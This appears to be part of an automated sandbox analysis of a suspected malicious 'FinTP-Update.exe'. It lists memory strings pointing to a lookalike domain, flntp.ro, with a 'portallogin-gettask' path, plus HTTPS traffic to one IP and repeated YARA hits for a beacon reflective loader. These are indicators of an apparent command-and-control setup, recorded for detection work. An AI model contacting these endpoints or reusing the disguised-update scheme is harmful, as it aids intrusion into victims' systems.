          Source: FinTP-Update.exe, 00000000.00000003.2170181010.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2243779777.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3357924421.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2380403205.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2266293573.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3321307037.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2313315862.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2673905234.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2651458102.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2221645510.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3276936352.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2491486119.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3188050658.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2403086446.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2897558123.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3299179602.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2720594519.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3344304389.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2764950621.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2626008832.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2357499921.0000017F36C24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/V
          Source: FinTP-Update.exe, 00000000.00000003.2765403526.0000017F3890F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/ptography
          Source: FinTP-Update.exe, 00000000.00000003.2199556611.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2919720968.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2243689631.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3358210766.0000017F388E0000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3276936352.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/rss/portallogin-gettask.html
          Source: FinTP-Update.exe, 00000000.00000003.2764950621.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2720385206.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3210222424.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2402975356.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2673905234.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3343869125.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2380403205.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3357924421.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3299071408.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3187878784.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3232356008.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3254690266.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2897558123.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2651300690.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2425134169.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2357499921.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2626008832.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2491328068.0000017F36B96000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3321307037.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2919720968.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3276936352.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/rss/portallogin-gettask.html&
          Source: FinTP-Update.exe, 00000000.00000003.2765403526.0000017F3890F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/rss/portallogin-gettask.html)p
          Source: FinTP-Update.exe, 00000000.00000003.2491564512.0000017F38910000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2626257376.0000017F3890F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/rss/portallogin-gettask.htmlAwtd
          Source: FinTP-Update.exe, 00000000.00000002.3357924421.0000017F36B54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/rss/portallogin-gettask.htmlC
          Source: FinTP-Update.exe, 00000000.00000003.2170181010.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2243779777.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3357924421.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2380403205.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2266293573.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3321307037.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2313315862.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2673905234.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2651458102.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2221645510.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3276936352.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2491486119.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3188050658.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2403086446.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2897558123.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3299179602.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2720594519.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3344304389.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2764950621.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2626008832.0000017F36C24000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2357499921.0000017F36C24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/rss/portallogin-gettask.htmlJ
          Source: FinTP-Update.exe, 00000000.00000003.2335452666.0000017F38910000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2313366127.0000017F3890E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/rss/portallogin-gettask.htmlO~
          Source: FinTP-Update.exe, 00000000.00000003.3210222424.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3343869125.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3357924421.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3299071408.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3187878784.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3232356008.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3254690266.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2897558123.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3321307037.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2919720968.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3276936352.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/rss/portallogin-gettask.htmlP
          Source: FinTP-Update.exe, 00000000.00000003.2491564512.0000017F38910000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/rss/portallogin-gettask.htmlPt
          Source: FinTP-Update.exe, 00000000.00000003.2221796771.0000017F3890B000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2765403526.0000017F3890F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/rss/portallogin-gettask.htmlct
          Source: FinTP-Update.exe, 00000000.00000002.3358210766.0000017F388E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/rss/portallogin-gettask.htmlder
          Source: FinTP-Update.exe, 00000000.00000003.3188115000.0000017F3890F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/rss/portallogin-gettask.htmlderPt
          Source: FinTP-Update.exe, 00000000.00000002.3357924421.0000017F36B54000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/rss/portallogin-gettask.htmlg
          Source: FinTP-Update.exe, 00000000.00000003.2221796771.0000017F3890B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/rss/portallogin-gettask.htmlk~
          Source: FinTP-Update.exe, 00000000.00000003.2357676850.0000017F38910000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/rss/portallogin-gettask.htmlmt
          Source: FinTP-Update.exe, 00000000.00000003.2491564512.0000017F38910000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2765403526.0000017F3890F000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2626257376.0000017F3890F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/rss/portallogin-gettask.htmlmw
          Source: FinTP-Update.exe, 00000000.00000003.2764950621.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2720385206.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2673905234.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2651300690.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2626008832.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/rss/portallogin-gettask.htmlople
          Source: FinTP-Update.exe, 00000000.00000003.2651528682.0000017F3890F000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2626257376.0000017F3890F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/rss/portallogin-gettask.htmlr
          Source: FinTP-Update.exe, 00000000.00000003.3343869125.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3357924421.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3299071408.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3321307037.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/rss/portallogin-gettask.htmlr&)
          Source: FinTP-Update.exe, 00000000.00000003.3343869125.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3357924421.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3299071408.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3254690266.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3321307037.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3276936352.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/rss/portallogin-gettask.htmlt
          Source: FinTP-Update.exe, 00000000.00000003.2764950621.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3210222424.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3343869125.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3357924421.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3299071408.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3187878784.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3232356008.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3254690266.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2897558123.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3321307037.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2919720968.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3276936352.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/rss/portallogin-gettask.htmlv
          Source: FinTP-Update.exe, 00000000.00000003.2764950621.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2720385206.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3210222424.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2402975356.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2673905234.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3343869125.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000002.3357924421.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3299071408.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3187878784.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3232356008.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3254690266.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2897558123.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2651300690.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2425134169.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2626008832.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2491328068.0000017F36B96000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3321307037.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.2919720968.0000017F36B97000.00000004.00000020.00020000.00000000.sdmp, FinTP-Update.exe, 00000000.00000003.3276936352.0000017F36B97000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.flntp.ro/rss/portallogin-gettask.htmlz1
          Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
          Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
          Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
          Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
          Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
          Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
          Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
          Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
          Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
          Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
          Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
          Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
          Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
          Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
          Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
          Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
          Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
          Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
          Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
          Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
          Source: unknownHTTPS traffic detected: 3.79.209.76:443 -> 192.168.2.5:49705 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 3.79.209.76:443 -> 192.168.2.5:49706 version: TLS 1.2

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: dump.pcap, type: PCAPMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.2425134169.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.2313200724.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.2313315862.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.2651300690.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.2764950621.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.2491328068.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.2491486119.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.3344304389.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.2897558123.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.2199556611.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.2199657950.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.3343869125.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.2673905234.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.2243779777.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.2720594519.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.3321457161.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.3232356008.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.3254690266.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.2335391870.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.2288382681.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.2626008832.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.2626162702.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.2765296970.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.3254891308.0000017F36BC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.2243689631.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: 00000000.00000003.2357499921.0000017F36BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
